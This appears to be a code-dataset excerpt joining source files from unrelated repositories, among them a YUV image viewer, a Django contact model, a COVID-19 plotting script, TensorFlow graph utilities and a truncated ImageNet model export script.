nn.MaxPool2D(kernel_size=3, stride=2),
nn.Conv2D(64, 192, kernel_size=5, padding=2),
nn.ReLU(),
nn.MaxPool2D(kernel_size=3, stride=2),
nn.Conv2D(192, 384, kernel_size=3, padding=1),
nn.ReLU(),
nn.Conv2D(384, 256, kernel_size=3, padding=1),
nn.ReLU(),
nn.Conv2D(256, 256, kernel_size=3, padding=1),
nn.ReLU(),
nn.MaxPool2D(kernel_size=3, stride=2),
)
self.avgpool = nn.AdaptiveAvgPool2D((6, 6))
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(256 * 6 * 6, 4096),
nn.ReLU(),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(),
nn.Linear(4096, num_classes),
)
def forward(self, x: paddle.Tensor) -> paddle.Tensor:
x = self.features(x)
x = self.avgpool(x)
x = paddle.flatten(x, 1)
x = self.classifier(x)
return x
class AlexNet(BaseNet):
def __init__(self):
super(AlexNet, self).__init__()
alexnet_ckpt = paddle.load(model_paths['alexnet'])
net = alexnet()
net.set_state_dict(alexnet_ckpt)
self.layers = net.features
self.target_layers = [2, 5, 8, 10, 12]
self.n_channels_list = [64, 192, 384, 256, 256]
self.set_requires_grad(False)
class VGG16(BaseNet):
def __init__(self):
super(VGG16, self).__init__()
self.layers = models.vgg16(pretrained=True).features
self.target_layers = [4, 9, 16, 23, 30]
self.n_channels_list = [64, 128, 256, 512, 512]
self.set_requires_grad(False)
``` |
{
"source": "772435284/QF-portfolio-investment-system",
"score": 3
} |
#### File: QF-portfolio-investment-system/environment/data.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import datetime
import gym
import gym.spaces
eps = 1e-8
date_format = '%Y-%m-%d'
start_date = '2014-03-21'
end_date = '2020-10-14'
start_datetime = datetime.datetime.strptime(start_date, date_format)
end_datetime = datetime.datetime.strptime(end_date, date_format)
def date_to_index(date_string):
    # Convert a date string into an integer index 0, 1, 2, 3...
    return (datetime.datetime.strptime(date_string, date_format) - start_datetime).days
def index_to_date(index):
    # Convert an integer index back into a date string
    return (start_datetime + datetime.timedelta(index)).strftime(date_format)
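# Example with the constants above (start_date = '2014-03-21'):
#   date_to_index('2014-03-22') == 1 and index_to_date(1) == '2014-03-22'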
# A class that is responsible for data processing
class DataProcessor(object):
def __init__(self, product_list, market_feature, feature_num, steps, window_length, mode, start_index=0, start_date=None):
import copy
self.train_ratio = 0.8
self.steps = steps + 1
self.window_length = window_length
self.window_size = 1
self.start_index = start_index
self.start_date = start_date
self.feature_num = feature_num
self.market_feature = market_feature
self.mode = mode
self._data= []
self.product_list = product_list
self.load_observations()
# Load data from the .csv files
def load_observations(self):
ts_d = pd.read_csv('Data/'+'D_'+'AUDUSD'+'.csv')
ts_d_len = len(ts_d)
csv_data = np.zeros((ts_d_len-self.window_size+1,self.feature_num, len(self.product_list),self.window_size ), dtype=float)
for k in range(len(self.product_list)):
product = self.product_list[k]
#print(product)
ts_d = pd.read_csv('Data/'+'D_'+product+'.csv')
ts_d = ts_d.dropna(axis=0,how='any')
for j in range(len(self.market_feature)):
ts_d_temp = ts_d[self.market_feature[j]].values
for i in range(len(ts_d)-self.window_size+1):
temp = np.zeros((self.window_size))
for t in range(i, i+self.window_size):
#temp = np.zeros((para_num))
temp[t-i] = ts_d_temp[t]
#print(temp)
csv_data[i][j][k] = temp
csv_data = csv_data[::-1].copy()
observations = csv_data
if self.mode == "Train":
self._data = observations[0:int(self.train_ratio * observations.shape[0])]
print("Shape for Train observations -- T: ", self._data.shape)
elif self.mode == "Test":
self._data = observations[int(self.train_ratio * observations.shape[0]):]
print("Shape for Test observations -- T: ", self._data.shape)
self._data = np.squeeze(self._data)
self._data = self._data.transpose(2, 0, 1)
def _step(self):
self.step += 1
obs = self.data[:, self.step:self.step + self.window_length, :].copy()
next_obs = self.data[:, self.step + self.window_length:self.step + self.window_length + 1, :].copy()
done = self.step >= self.steps
return obs, done, next_obs
def reset(self):
self.step = 0
if self.start_date is None:
# randomly sample date
self.idx = np.random.randint(
low=self.window_length, high=self._data.shape[1] - self.steps)
else:
self.idx = date_to_index(self.start_date) - self.start_index
        assert self.idx >= self.window_length and self.idx <= self._data.shape[1] - self.steps, \
            'Invalid start date: it must be at least window_length days after the start date and steps days before the end date'
data = self._data[:, self.idx - self.window_length:self.idx + self.steps + 1, :8]
self.data = data
return self.data[:, self.step:self.step + self.window_length, :].copy(), \
self.data[:, self.step + self.window_length:self.step + self.window_length + 1, :].copy()
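# Hypothetical usage sketch (arguments are illustrative and assume CSVs such as Data/D_AUDUSD.csv exist):
#   dp = DataProcessor(product_list=['AUDUSD'], market_feature=['Close'], feature_num=1,
#                      steps=500, window_length=50, mode='Train')
#   obs, next_obs = dp.reset()        # initial observation window and the step that follows it
#   obs, done, next_obs = dp._step()  # advance the internal pointer by one step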
``` |
{
"source": "772700563/MyBlogEntries",
"score": 3
} |
#### File: MyBlogEntries/Dijkstra/result.py
```python
from numpy import mean
from numpy import std
def makeTable(Fs, Es):
    As = []
    for E in Es:
        Rs = []
        for F in Fs:
            Ds = []
            with open("logs/" + E + ".dat-" + F + ".log") as Ls:
                for L in Ls:
                    A = L.split()
                    if A[0] == 'Time':
                        Ds.append(float(A[1]))
            Rs.append([mean(Ds), std(Ds)])
        As.append(Rs)
    return As
def printTable(Fs, As):
    for F in Fs:
        print("|", F, end=' ')
    print()
    for A in As:
        for R in A:
            print(str(round(R[0], 3)) + "(%.3f)" % round(R[1], 2), end=' ')
        print()
# Start the script here
Fs = ["dijkstra","dijkstra_bgl","dijkstra_lemon","dijkstra_or-tools"]
Es = ["rand_10000_100000","rand_10000_1000000","rand_10000_10000000"]
Gs = ["dijkstra","dijkstra_bgl","dijkstra_lemon"]
Hs = ["US-d.W", "US-d.E", "US-d.LKS", "US-d.CAL", "US-d.NE", "US-d.NW", "US-d.FLA", "US-d.COL", "US-d.BAY", "US-d.NY"]
Is = ["dijkstra_binary", "dijkstra_ternary", "dijkstra_skew", "dijkstra_lemon"]
for A,B in [[Fs,Es],[Gs,Hs],[Is,Hs]]:
Ts = makeTable(A,B)
printTable(A, Ts)
    print()
``` |
{
"source": "774no2danuma/YUV-Observer",
"score": 3
} |
#### File: YUV-Observer/v0.1.0.0/yuvobserver_gui.py
```python
import numpy as np
import os
import re
import sys
import cv2
import tkinter
from tkinter import *
from tkinter import ttk
import tkinter.filedialog
from PIL import Image, ImageTk
def import_yuv():
    # Show the file-selection dialog
file_path = tkinter.filedialog.askopenfilename()
if len(file_path) != 0:
        # A file was selected
data = file_path
read_img(data)
else:
data = ''
def get_help():
print('menu2!')
def quit():
sys.exit()
def show_version():
u""" Tk() と同じような感じで使える """
sub_win = Toplevel(master = root.master)
sub_win.title('yuvObserver v0.1.0.0 - Version')
sub_win.geometry('350x100')
sub_win.resizable(width=False, height=False)
label = tkinter.Label(sub_win,
text='yuvObserverGUI.exe v0.1.0.0\nCopyright (c) <NAME>. CIT YYLab B4 2021\nAll rights reserved.',
font=('System', 10))
label.place(x=15, y=10)
button = Button(sub_win, text = 'OK', command = sub_win.destroy)
button.place(x=160, y=70)
u""" フォーカス移動 """
button.focus_set()
sub_win.transient(root.master)
sub_win.grab_set()
def read_img(path):
global u_img, v_img
image_path = path
fr = open(image_path, 'rb')
path_str = str(image_path)
    size_p = str(re.findall(r'\((.*)\)', path_str))
size_s = size_p.split('x')
w = size_s[0].strip("[']")
h = size_s[1].strip("[']")
size_c = h.split(',YUV')
width = int(w)
height = int(size_c[0])
color = int(size_c[1])
print(width,height,color)
data = np.fromfile(fr, dtype=np.uint8)
data = np.ravel(data)
fr.close()
print('data len', len(data))
#rgb_arr = np.array([[1.164, 0, 1.596],
# [1.164,0.391, 0.813],
# [1.164, 2.018, 0]])
if color == 444:
wxh = width*height
y = np.array(data[:wxh])
u = np.array(data[wxh:wxh*2])
v = np.array(data[wxh*2:])
y = y.reshape(height,width)
u = u.reshape(height,width)
v = v.reshape(height,width)
yuv = np.stack([y,u,v],axis=2)
#r = np.array(rgb_arr[0,0]*(y)+rgb_arr[0,2]*(v)).astype(np.uint8)
#g = np.array(rgb_arr[1,0]*(y)-rgb_arr[1,1]*(u)-rgb_arr[1,2]*(v)).astype(np.uint8)
#b = np.array(rgb_arr[2,0]*(y)+rgb_arr[2,2]*(u)).astype(np.uint8)
#rgb = np.stack([r,g,b],axis=2)
rgb = cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR)
elif color == 422:
wxh = width*height
wxh_ = (width//2)*height
y = np.array(data[:wxh])
u = np.array(data[wxh:wxh+wxh_])
v = np.array(data[wxh+wxh_:])
y = y.reshape(height,width)
u = u.reshape(height,width//2)
v = v.reshape(height,width//2)
y0 = np.expand_dims(y[:,::2], axis=2)
u = np.expand_dims(u, axis=2)
y1 = np.expand_dims(y[:,1::2], axis=2)
v = np.expand_dims(v, axis=2)
img_yuv = np.concatenate((y0, u, y1, v), axis=2)
img_yuv_cvt = img_yuv.reshape(img_yuv.shape[0], img_yuv.shape[1] * 2, int(img_yuv.shape[2] / 2))
rgb = cv2.cvtColor(img_yuv_cvt, cv2.COLOR_YUV2BGR_YUYV)
#r = np.array(rgb_arr[0,0]*(y-16)+rgb_arr[0,2]*(v_-128)).astype(np.uint8)
#g = np.array(rgb_arr[1,0]*(y-16)-rgb_arr[1,1]*(u_-128)-rgb_arr[1,2]*(v_-128)).astype(np.uint8)
#b = np.array(rgb_arr[2,0]*(y-16)+rgb_arr[2,2]*(u_-128)).astype(np.uint8)
#rgb = np.stack([r,g,b],axis=2).astype(np.uint8)
#rgb = cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR_YUY2)
elif color == 420:
f = open(path,'rb')
yuv = np.frombuffer(f.read(width*height*3//2), dtype=np.uint8).reshape((height*3//2, width))
rgb = cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR_I420)
f.close()
elif color == 400:
wxh = width*height
y = np.array(data[:wxh])
y = y.reshape(height,width)
rgb = Image.fromarray(y,'L')
show_img(rgb,width,height,path_str,color)
def show_img(data,w,h,path,c):
global canvas, u_img, v_img
root.title('yuvObserver v0.1.0.0 - '+path)
if c != 400:
image_rgb = cv2.cvtColor(data, cv2.COLOR_BGR2RGB)
        image_pil = Image.fromarray(image_rgb)  # convert from an RGB array to a PIL image
else:
image_pil = data
    image_tk = ImageTk.PhotoImage(image_pil)  # convert to ImageTk format
canvas.delete('img')
print(canvas)
    canvas.create_image(0, 0, image=image_tk, anchor='nw', tag='img')  # place the ImageTk image
canvas.grid(sticky=tkinter.W + tkinter.E + tkinter.N + tkinter.S)
#root.geometry("{0}x{1}".format(w,h))
canvas.configure(scrollregion=(0,0,w,h))
app = root
    xbar = tkinter.Scrollbar(
        app,  # parent widget
        orient=tkinter.HORIZONTAL,  # bar orientation
    )
    # Create the vertical scrollbar
    ybar = tkinter.Scrollbar(
        app,  # parent widget
        orient=tkinter.VERTICAL,  # bar orientation
    )
    # Place the horizontal scrollbar below the canvas
    xbar.grid(
        row=1, column=0,  # position below the canvas
        sticky=tkinter.W + tkinter.E  # stretch across the full width
    )
    # Place the vertical scrollbar to the right of the canvas
    ybar.grid(
        row=0, column=1,  # position to the right of the canvas
        sticky=tkinter.N + tkinter.S  # stretch across the full height
    )
    # Settings that let the scrollbars scroll the canvas
    # Set the handler executed when a scrollbar slider is moved
    xbar.config(
        command=canvas.xview
    )
    ybar.config(
        command=canvas.yview
    )
    # Set the handlers executed when the canvas itself is scrolled
    canvas.config(
        xscrollcommand=xbar.set
    )
    canvas.config(
        yscrollcommand=ybar.set
    )
root.mainloop()
def main():
read_img('bird-20(1024x672,YUV422).yuv')
if __name__ == '__main__':
root = Tk()
menubar = Menu(root)
# File Menu
filemenu = Menu(menubar, tearoff=0)
filemenu.add_command(label='YUV File Open', command=import_yuv)
filemenu.add_separator()
filemenu.add_command(label='Exit', command=quit)
# Help
helpmenu = Menu(menubar, tearoff=0)
helpmenu.add_command(label='Version', command=show_version)
helpmenu.add_command(label='Help', command=get_help)
# Add
menubar.add_cascade(label='File', menu=filemenu)
menubar.add_cascade(label='Help', menu=helpmenu)
root.config(menu=menubar)
root.title('yuvObserverGUI v0.1.0.0')
root.minsize(640,512)
root.rowconfigure(0, weight=1)
root.columnconfigure(0, weight=1)
frame1 = ttk.Frame(root)
frame1.rowconfigure(0, weight=1)
frame1.columnconfigure(0,weight=1)
    canvas = tkinter.Canvas(root, width=500, height=500)  # create the Canvas
canvas.grid()
if len(sys.argv) > 1:
read_img(sys.argv[1])
root.mainloop()
#main()
``` |
{
"source": "775269512/WHUT_CUMCM20",
"score": 3
} |
#### File: 选拔赛/code/q1.py
```python
import numpy as np
from math import *
import random
from bayes_opt import BayesianOptimization
a = 30
b = 20
len = 606#6060
wi = 216#2160
def get_theta(theta,a=a,b=b,l=len,w=wi):
theta = theta/360*pi
x = sqrt(4*a*b/(b*sin(theta)*sin(theta)+a*cos(theta)*cos(theta)))
i,j=0,0
ww = w
num=0
detal = x-x*cos(theta)
while j != int(ww / (2 * b)) + 1:
for i in range(int(l/(2*x*cos(theta)))):
num = num+1
# print(j,int(ww / (2 * b)))
j+=1
ww=w+j*1
return num
# get_theta(60)
#
rf_bo = BayesianOptimization(
get_theta,
{'theta': (30, 60),}
)
print(rf_bo.maximize())
import matplotlib.pyplot as plt
import numpy.random as rnd
from matplotlib.patches import Ellipse
detal = a-sqrt(3)*a/2
ells = []
j=0
h = wi
while j != int(h/(2*b))+1:
for i in range(int(len/(2*a))):
if j%2==0:
e = Ellipse(xy=[i*2*a+a,j*2*b+b-detal*j], width=a*2, height=b*2, angle=0)
else:
e = Ellipse(xy=[i*2*a+2*a,j*2*b+b-detal*j], width=a*2, height=b*2, angle=0)
ells.append(e)
print(j,int(h/(2*b)))
j = j+1
h = wi+detal*j
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(111, aspect='equal')
for e in ells:
ax.add_artist(e)
e.set_clip_box(ax.bbox)
alf = rnd.rand()+0.1
alf = 1 if alf>1 else alf
e.set_alpha(alf)
# e.set_facecolor(rnd.rand(3))
ax.set_xlim(0, len)
ax.set_ylim(0, wi)
plt.show()
# plt.savefig("demo.png")
``` |
{
"source": "77598072/rabbitpy",
"score": 2
} |
#### File: rabbitpy/rabbitpy/__init__.py
```python
__version__ = '1.0.0'
import logging
from rabbitpy.amqp import AMQP
from rabbitpy.connection import Connection
from rabbitpy.channel import Channel
from rabbitpy.exchange import Exchange
from rabbitpy.exchange import DirectExchange
from rabbitpy.exchange import FanoutExchange
from rabbitpy.exchange import HeadersExchange
from rabbitpy.exchange import TopicExchange
from rabbitpy.message import Message
from rabbitpy.amqp_queue import Queue
from rabbitpy.tx import Tx
from rabbitpy.simple import SimpleChannel
from rabbitpy.simple import consume
from rabbitpy.simple import get
from rabbitpy.simple import publish
from rabbitpy.simple import create_queue
from rabbitpy.simple import delete_queue
from rabbitpy.simple import create_direct_exchange
from rabbitpy.simple import create_fanout_exchange
from rabbitpy.simple import create_headers_exchange
from rabbitpy.simple import create_topic_exchange
from rabbitpy.simple import delete_exchange
if hasattr(logging, 'NullHandler'):
NullHandler = logging.NullHandler
else:
"""Python 2.6 does not have a NullHandler"""
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger('rabbitpy').addHandler(NullHandler())
__all__ = [
'__version__',
'amqp_queue',
'channel',
'connection',
'exceptions',
'exchange',
'message',
'simple',
'tx',
'AMQP',
'Connection',
'Channel',
'SimpleChannel',
'Exchange',
'DirectExchange',
'FanoutExchange',
'HeadersExchange',
'TopicExchange',
'Message',
'Queue',
'Tx',
'consume',
'get',
'publish',
'create_queue',
'delete_queue',
'create_direct_exchange',
'create_fanout_exchange',
'create_headers_exchange',
'create_topic_exchange',
'delete_exchange'
]
``` |
{
"source": "776166/PythonDevTest",
"score": 3
} |
#### File: site/contacts/models.py
```python
import phonenumbers
from django.core.exceptions import ValidationError
from django.db import models
from phonenumber_field.modelfields import PhoneNumberField
def validate_phone(value):
    try:
        z = phonenumbers.parse(value, None)
    except phonenumbers.NumberParseException:
        raise ValidationError(
            ('%(value)s is not a valid phone number'),
            params={'value': value},
        )
    if not phonenumbers.is_possible_number(z):
        raise ValidationError(
            ('%(value)s is not a valid phone number'),
            params={'value': value},
        )
class Model(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
@property
def model_name(self):
return self.__class__.__name__.lower()
class Contact(Model):
name = models.CharField('Name', max_length=256, blank=False, null=False)
company = models.CharField(
'Company', max_length=256, blank=False, null=False)
email = models.EmailField('Email', max_length=256, blank=False, null=False)
phone = PhoneNumberField(blank=True, validators=[validate_phone])
interest = models.CharField(
'Interests', max_length=256, blank=True, null=True)
def __str__(self):
return self.name
``` |
{
"source": "776166/yggdrasil-django",
"score": 2
} |
#### File: management/commands/engine_version.py
```python
from django.core.management.base import BaseCommand
from engine.version import VERSION_STRING
class Command(BaseCommand):
"""Return engine version.
Returns:
format <version in x.x.x format>-<date in YYYYMMDD format>-<revision whatever>
Ex: '0.1.0-19910220-1'
"""
help = 'Engine version (example: \'0.1.0-19910220-1\')'
def handle(self, *args, **options):
return(VERSION_STRING)
# print('%s-%s-%s' % (settings.VERSION['version'], settings.VERSION['date'], settings.VERSION['revision']))
```
#### File: site/social_auth/pipeline.py
```python
from social_core.pipeline.partial import partial
@partial
def require_email(strategy, details, user=None, is_new=False, *args, **kwargs):
if kwargs.get('ajax') or user and user.email:
return
elif is_new and not details.get('email'):
email = strategy.request_data().get('email')
if email:
details['email'] = email
else:
current_partial = kwargs.get('current_partial')
return strategy.redirect(
'/social_auth/email?partial_token={0}'.format(
current_partial.token)
)
``` |
{
"source": "777irug/Covid-19",
"score": 4
} |
#### File: 777irug/Covid-19/covidDataset.py
```python
import pandas as pd
import seaborn as sns
import matplotlib.pylab as plt
df=pd.read_csv("covid_19_india.csv",parse_dates=["Date"])
df.columns
df.dtypes
for x in df.columns:
print(x,df[x].isna().sum())
df['year']=df['Date'].dt.year
df['month']=df['Date'].dt.month
df=df.sort_values(by=['month'])
df.dtypes
def month(x):
if x==1:
return 'January'
elif x==2:
return 'Febraury'
elif x==3:
return 'March'
elif x==4:
return 'April'
elif x==5:
return 'May'
elif x==6:
return 'June'
elif x==7:
return 'July'
elif x==8:
return 'August'
elif x==9:
return 'September'
elif x==10:
return 'October'
elif x==11:
return 'November'
elif x==12:
return 'December'
df['month']=df['month'].apply(month)
#confirmed cases in india date-wise
#monthwise
c=input("Enter the State or Union Territory name: ")
state_info= df[df['State/UnionTerritory']==c]
ax=sns.lineplot(
data=state_info,
x="month", y="Confirmed", hue="year"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of confimed cases for '+c)
#cured
c=input("Enter the State or Union Territory name: ")
state_info= df[df['State/UnionTerritory']==c]
ax=sns.lineplot(
data=state_info,
x="month", y="Cured", hue="year"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of Cured cases for '+c)
#deaths
c=input("Enter the State or Union Territory name: ")
state_info= df[df['State/UnionTerritory']==c]
ax=sns.lineplot(
data=state_info,
x="month", y="Deaths", hue="year"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of Deaths for '+c)
#yearwise
c=input("Enter the State or Union Territory name: ")
y=int(input("Enter the year: "))
state_info= df[(df['State/UnionTerritory']==c) & ( df['year']==y)]
ax=sns.lineplot(
data=state_info,
x="month", y="Confirmed",hue="year", style="State/UnionTerritory",
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of confimed cases for '+c+' in '+str(y))
c=input("Enter the State or Union Territory name: ")
y=int(input("Enter the year: "))
state_info= df[(df['State/UnionTerritory']==c) & ( df['year']==y)]
ax=sns.lineplot(
data=state_info,
x="month", y="Cured"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of Cured cases for '+c+' in '+str(y))
c=input("Enter the State or Union Territory name: ")
y=int(input("Enter the year: "))
state_info= df[(df['State/UnionTerritory']==c) & ( df['year']==y)]
ax=sns.lineplot(
data=state_info,
x="month", y="Deaths"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of Deaths for '+c+' in '+str(y))
ax=sns.lineplot(
data=state_info,
x="Date", y="Deaths"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of Deaths for '+c+' in '+str(y))
c=input("Enter the State or Union Territory name: ")
y=int(input("Enter the year: "))
m=input("Enter the month: ")
state_info= df[(df['State/UnionTerritory']==c) & ( df['year']==y) & (df['month']==m)]
ax=sns.lineplot(
data=state_info,
x="Date", y="Confirmed"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of confimed cases for '+c+' in '+str(m)+str(y))
c=input("Enter the State or Union Territory name: ")
y=int(input("Enter the year: "))
m=input("Enter the month: ")
state_info = df[(df['State/UnionTerritory']==c) & (df['year']==y) & (df['month']==m)]
ax=sns.lineplot(
data=state_info,
x="Date", y="Confirmed"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of confimed cases for '+c+' in '+str(m)+str(y))
#all
c=input("Enter the State/UnionTerritory: ")
country=df[df['State/UnionTerritory']==c]
ax=sns.lineplot(
data=country,
x="month", y="Confirmed", hue='year',
)
#Death
ax=sns.lineplot(
data=country,
x="month", y="Deaths",hue='year',
)
ax=sns.lineplot(
data=country,
x="month", y="Cured",hue='year',
)
ax.set_title('No of all cases for '+c)
plt.xticks(rotation=70)
plt.tight_layout()
state=df[df['State/UnionTerritory']=='Punjab']
state=state.sort_values('Date')
state=state.groupby('Date')['Confirmed'].sum().reset_index()
state=state.set_index('Date')
y = state['Confirmed'].resample('MS').mean()
y[:'2020']
y.plot(figsize=(15, 6))
plt.show()
``` |
{
"source": "777ki/alibabacloud-pai-dsw-cn-demo",
"score": 2
} |
#### File: dawnbench_mlperf_dsw/cases/amp_util.py
```python
import sys
import pdb
import time
import tensorflow as tf
import numpy as np
from tensorflow.core.protobuf import rewriter_config_pb2
def load_graph(pb_file_path):
pb_graph_def = tf.GraphDef()
with open(pb_file_path, 'rb') as f:
pb_graph_def.ParseFromString(f.read())
return pb_graph_def
def save_graph(graph_def, pb_file_path):
with tf.gfile.FastGFile(pb_file_path, mode='wb') as f:
f.write(graph_def.SerializeToString())
return pb_file_path
def graph_to_pb(sess, graph, output_names):
input_graph_def = graph.as_graph_def()
from tensorflow.python.framework import graph_util
# We use a built-in TF helper to export variables to constant
output_graph_def = graph_util.convert_variables_to_constants(
sess,
input_graph_def,
output_node_names=output_names)
return output_graph_def
def load_savedmodel(model_path):
from tensorflow.python.saved_model import loader_impl
saved_model = loader_impl._parse_saved_model(model_path)
tf.reset_default_graph()
cfg = tf.ConfigProto(allow_soft_placement=True,
log_device_placement=False)
cfg.gpu_options.allow_growth = True
with tf.Session(config=cfg) as sess:
tags = saved_model.meta_graphs[0].meta_info_def.tags
meta_graph_def = tf.saved_model.loader.load(sess, tags, model_path)
        sdef_key = list(meta_graph_def.signature_def.keys())[0]
tmp_outputs = meta_graph_def.signature_def[sdef_key].outputs.values()
model_outputs = [v.name[:-2] for v in tmp_outputs]
graph_def = tf.graph_util.convert_variables_to_constants(
sess, sess.graph_def, model_outputs)
graph_def = tf.graph_util.extract_sub_graph(graph_def, model_outputs)
for i,node in enumerate(graph_def.node):
if '_class' in node.attr.keys():
node.attr.pop('_class')
return graph_def
def getSessConfig():
gpu_options = tf.GPUOptions(allow_growth=True,
allocator_type='BFC',
per_process_gpu_memory_fraction=1.0)
config = tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True,
gpu_options=gpu_options)
return config
def getOffLayoutConfig():
rewrite_options = rewriter_config_pb2.RewriterConfig(layout_optimizer=rewriter_config_pb2.RewriterConfig.OFF)
graph_options = tf.GraphOptions(rewrite_options=rewrite_options)
gpu_options = tf.GPUOptions(allow_growth=True,
allocator_type='BFC',
per_process_gpu_memory_fraction=1.0)
config = tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True,
gpu_options=gpu_options,
graph_options = graph_options)
return config
def print_graph_infor(graph_def, logging):
for i,n in enumerate(graph_def.node):
logging.info(n.name)
#if (n.op == 'Conv2D'):
# logging.info("Name of the node - %s" % n.name)
# for j,n_input in enumerate(n.input):
# logging.info("input[{}] of the node {} - {}".format(j, n.name, n_input))
def flops_stat(graph, logging):
flops_ori = 0
params_ori = 0
for op in graph.get_operations():
if (op.type in ['Conv2D', 'MatMul']) and op.name.startswith('resnet_model'):
# NHWC, HWMN
if op.type == 'Conv2D':
flops_layer= op.outputs[0].shape[1] * op.outputs[0].shape[2] * \
np.prod(op.inputs[1].shape)
else:
flops_layer= np.prod(op.inputs[1].shape)
flops_layer *= 2
params_layer = np.prod(op.inputs[1].shape)
flops_ori += flops_layer
params_ori += params_layer
logging.info('Flops: {:}, Params: {:}, Input Shape: {:}, Output Shape: {:}, Kernel Shape: {:} of layer: {:}'.
format(flops_layer, params_layer, op.inputs[0].shape, op.outputs[0].shape, op.inputs[1].shape, op.name))
elif op.type in ['MaxPool']:
pool_size = 3
flops_layer= op.outputs[0].shape[1] * op.outputs[0].shape[2] * \
op.outputs[0].shape[3] * pool_size * pool_size
flops_ori += flops_layer
logging.info('Flops: {:} of layer: {:}'.format(flops_layer, op.name))
logging.info('Total flops: {:}, and total params: {:}'.format(flops_ori, params_ori))
def extract_graph_node(graph_def, logging):
activate_dict = {}
kernel_dict = {}
act_kernel_list = []
op_kernel_list = []
for i,n in enumerate(graph_def.node):
if (n.op in ['Conv2D', 'MatMul']): # 'MatMul'
logging.info("Name of the node - %s" % n.name)
act_name = n.input[0]+':0'
activate_dict[act_name] = [] # input tensor name, scaling factor
logging.info("input[{}] of the node {} - {}".format(0, n.name, act_name))
if 'read' in n.input[1]:
kernel_name = n.input[1][:-5] # kernel const node name
else:
kernel_name = n.input[1] # kernel const node name
logging.info("input[{}] of the node {} - {}".format(1, n.name, kernel_name))
kernel_dict[kernel_name] = 1. # kernel const node name, scaling factor
act_kernel_list.append((act_name, kernel_name))
op_kernel_list.append((act_name, n.name, kernel_name))
return activate_dict, kernel_dict, act_kernel_list, op_kernel_list
```
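For context, a short hypothetical sketch of how the helpers above can be chained; the `.pb` paths are placeholders and the calls assume they run in the same module as the helpers:
```python
# Hypothetical sketch: load a frozen graph, inspect it, and write it back out.
import logging
logging.basicConfig(level=logging.INFO)

graph_def = load_graph('frozen_model.pb')        # parse a frozen GraphDef from disk
print_graph_infor(graph_def, logging)            # log every node name in the graph
acts, kernels, ak_pairs, op_kernels = extract_graph_node(graph_def, logging)
save_graph(graph_def, 'frozen_model_copy.pb')    # write the (unmodified) graph back out
```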
#### File: alibabacloud-pai-dsw-cn-demo/dawnbench_mlperf_dsw/imagenet_export.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import oss2
import argparse
import logging
import tensorflow as tf # pylint: disable=g-bad-import-order
from imagenet_main import *
from utils.export import export
from quantize.quant_hooks_v2 import QuantHook
import tensorflow_io.oss
import tensorflow_io.oss.python.ops.ossfs_ops
parser = argparse.ArgumentParser(description='TF Graph Test')
parser.add_argument('--model-dir', default='./ft_model/', type=str,
help='model path')
parser.add_argument('--data-dir', default='/data/ImageNet_TFRecorder', type=str,
help='model path')
parser.add_argument('--pickle-model', default='./gap_save/gap_pruned.pkl', type=str,
help='pickle path')
parser.add_argument('--final-size', default=2048, type=int, metavar='N',
help='final size')
parser.add_argument('--export-dir', default='./export/', type=str,
help='export path')
parser.add_argument('--enable-quantize', '-eqz', action='store_true',
help='if True quantization is enabled.')
parser.add_argument('--q-bits', default=4, type=int, metavar='N',
help='quantization bits')
parser.add_argument("--oss_load", "-osl", action='store_true',
help="[default: %(default)s] oss_load: If True dataset is loaded from oss.")
parser.add_argument('--log-name', type=str, default='export_eval', help='log name')
args = parser.parse_args()
# set logging system
logging.basicConfig(level=logging.INFO,
format='[%(asctime)s] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename='export/'+args.log_name+'.log')
logging.info(args)
_BATCH_SIZE = 256
_LABEL_CLASSES = 1001
_DEFAULT_IMAGE_SIZE = 224
_NUM_CHANNELS = 3
_NUM_IMAGES = {
'train': 1281167,
'validation': 50000,
}
_NUM_TRAIN_FILES = 8
_SHUFFLE_BUFFER = 1500
_ACCESS_ID = "<TBD>"
_ACCESS_KEY = "<TBD>"
_HOST = "<TBD>"
_BUCKET = "<TBD>"
if args.oss_load:
auth = oss2.Auth(_ACCESS_ID, _ACCESS_KEY)
bucket = oss2.Bucket(auth, _HOST, _BUCKET)
shape=[_DEFAULT_IMAGE_SIZE, _DEFAULT_IMAGE_SIZE, _NUM_CHANNELS]
# create estimator
session_config = tf.ConfigProto(
inter_op_parallelism_threads=0,
intra_op_parallelism_threads=0,
allow_soft_placement=True)
distribution = tf.contrib.distribute.OneDeviceStrategy('device:GPU:0')
run_config = tf.estimator.RunConfig(train_distribute=distribution,
session_config=session_config)
classifier = tf.estimator.Estimator(
model_fn=imagenet_model_fn,
model_dir=args.model_dir, config=run_config,
params={
'resnet_size': 26,
'final_size': args.final_size,
'pickle_model': args.pickle_model,
'random_init': False,
'data_format': "channels_last",
'batch_size': _BATCH_SIZE,
'train_epochs': 1,
'version': 34,
'version_t': 1,
'loss_scale': 1,
'gap_train': False,
'gap_lambda': 0.00001,
'gap_ft': False,
'gap_start': 0,
'dtype': tf.float32,
'learn_rate': 0.1,
'label_smoothing': 0.,
'enable_lars': False,
'enable_cos': False,
'cos_alpha': 0.001,
'warm_up': False,
'weight_decay': 0.00001,
'fine_tune': False,
'enable_kd': False,
'kd_size': 50,
'temp_dst': 1.,
'w_dst': 1.,
'mix_up': False,
'mx_mode': 0,
